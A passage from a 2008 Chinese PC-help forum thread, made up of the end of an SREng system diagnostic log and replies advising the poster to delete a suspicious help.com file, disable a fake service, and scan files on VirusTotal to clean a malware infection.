[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\nfio.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\fsdrvplg.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\FSSync.dll] [Kaspersky Lab, 7.0.5.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\basegui.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\thpimpl.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\winreg.ppl] [Kaspersky Lab, 7.0.1.325]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 2148 / cyscys][D:\Program Files\sreng2\SREngLdr.EXE] [Smallfrogs Studio, 2.6.12.1018]
[PID: 2280 / cyscys][D:\Program Files\sreng2\SRE5408720f.EXE] [Smallfrogs Studio, 2.6.12.1018]
[D:\Program Files\sreng2\Upload\3rdUpd.DLL] [Smallfrogs Studio, 2, 1, 0, 15]
==================================
文件关联
.TXT Error. [C:\WINDOWS\notepad.exe %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM Error. ["hh.exe" %1]
.HLP OK. [%SystemRoot%\system32\winhlp32.exe %1]
.INI Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.VBS Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.JS Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]
==================================
Winsock 提供者
N/A
==================================
Autorun.inf
N/A
==================================
HOSTS 文件
127.0.0.1 localhost
==================================
进程特权扫描
特殊特权被允许: SeLoadDriverPrivilege [PID = 520, C:\PROGRAM FILES\CFOSSPEED\CFOSSPEED.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 604, D:\PROGRAM FILES\ALFACLOCK\ALFACLOCK.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 632, C:\PROGRAM FILES\WINTOOLS\RAM SAVER PRO\RAMSAVERPRO.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 728, C:\PROGRAM FILES\CFOSSPEED\SPD.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2172, D:\PROGRAM FILES\BITSPIRIT\BITSPIRIT.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 3904, D:\PROGRAM FILES\MAXTHON\MAXTHON.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2148, D:\PROGRAM FILES\SRENG2\SRENGLDR.EXE]
==================================
API HOOK
N/A
==================================
隐藏进程
N/A
==================================
[/code]
[[i] 本帖最后由 秋叶濛濛 于 2008-8-30 09:52 编辑 [/i]] [b]1.建议使用XDelBox删除以下文件[/b]:([url=http://www.dodudou.com/down/index.php]XDelBox1.7下载[/url])
使用说明:删除时复制所有要删除文件的路径,在待删除文件列表里点击右键选择从“剪贴板导入不检查路径”,导入后在要删除文件上点击右键,选择立刻重启删除,电脑会重启进入DOS界面进行删除操作。运行xdelbox前最好卸载所有可移动存储介质(包括U盘,MP3,手机存储卡等)。
C:\Program Files\Internet Explorer\help.com
[b]2.删除重启后使用SREng修复下面各项:[/b]
启动项目 -- 服务 -- Win32服务应用程序之如下项禁用:
[Clip Book server / Clip Book server][Stopped/Auto Start]
<C:\Program Files\Internet Explorer\help.com><(File is missing)>
--------------------------------------------------------------
C:\WINDOWS\explorer.exe
C:\WINDOWS\Explorer.EXE
这两个上传到[url]http://www.virustotal.com/zh-cn/[/url]进行检测 help.com没有问题,是XDELBOX留下的痕迹
EXPLORER.EXE 1/36 只有瑞星报病毒 C:\Program Files\Internet Explorer\help.com
是xdelbox的遗留[:11:]
别的看不出什么来
下载windows清理助手清理一遍
[url]http://www.arswp.com/download/arswp2/arswp2.zip[/url] 清理过了
主要就是除了顶楼描述的,其他一点中毒的迹象就没有,而且开机运行很好,过一段时间才突然出现个EXE文件报毒。郁闷啊 继续求助啊~~~ 达人快来 清理IE和系统临时文件,用windows清理系统
然后发SREng上来,记得勾选检查进程模块的数字签名。
页:
[1]